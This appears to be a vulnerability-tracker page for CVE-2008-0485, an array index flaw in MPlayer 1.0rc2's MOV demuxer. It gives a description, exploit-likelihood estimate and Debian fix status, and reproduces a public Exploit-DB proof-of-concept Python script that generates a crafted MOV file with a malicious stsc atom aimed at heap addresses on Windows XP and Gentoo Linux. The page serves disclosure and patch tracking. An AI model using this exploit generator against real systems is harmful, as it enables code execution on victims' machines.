CVE-2008-0485

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Array index error in libmpdemux/demux_mov.c in MPlayer 1.0 rc2 and earlier might allow remote attackers to execute arbitrary code via a QuickTime MOV file with a crafted stsc atom tag.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-31076 remote linux verified python · 2 KB

Felipe Manzano · 2008-02-04

MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution

python exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/27499/info

MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory.

An attacker can exploit this issue to execute arbitrary code, which can result in the complete compromise of the computer. Failed exploit attempts will result in a denial-of-service condition.

This issue affects MPlayer 1.0rc2; other versions may also be affected. 

#!/bin/python

import struct
import sys

def mkatom(type,data):
     if len(type) != 4:
         raise "type must by of length 4!!!"
     mov = ""
     mov += struct.pack(">L",len(data)+8)
     mov += type
     mov += data
     return mov

def poc(address, block_size):

     what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
     base= ((address - 8) / block_size) +1

     ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
     mdat = mkatom("mdat","MALDAAAAAD!")
     stsc  = mkatom("stsc",struct.pack(">L",1) + \
                     struct.pack(">L",2) + \
                     struct.pack(">L",base) + \
                     what + \
                     struct.pack(">L",base+300)+what)
     trak = mkatom("trak",stsc)
     moov = mkatom("moov",trak)

     file = ftyp + mdat + moov
     return file

try:
     if sys.argv[2] != "linux":
         evilness = poc(0x0122e000, 24)     #Windows XP SP2 Prof. ES
     else:
         evilness = poc(0x088aa020, 20)     #Linux Gentoo

     print "[+] Generating file: %s" % sys.argv[1]
     file = open(sys.argv[1], "wb")
     file.write(evilness)
     file.close()
     print "[+] Done."

except Exception, e:
     print "[+] Usage: python mplayer_poc.py filename.mov windows (For
WinXP Prof SP2 ES)"
     print "           python mplayer_poc.py filename.mov linux     (For
Linux Gentoo)"

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.0~rc2-8`
sid	Fixed	`1.0~rc2-8`
forky	Fixed	`1.0~rc2-8`
bullseye	Fixed	`1.0~rc2-8`
bookworm	Fixed	`1.0~rc2-8`

References

https://security-tracker.debian.org/tracker/CVE-2008-0485

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.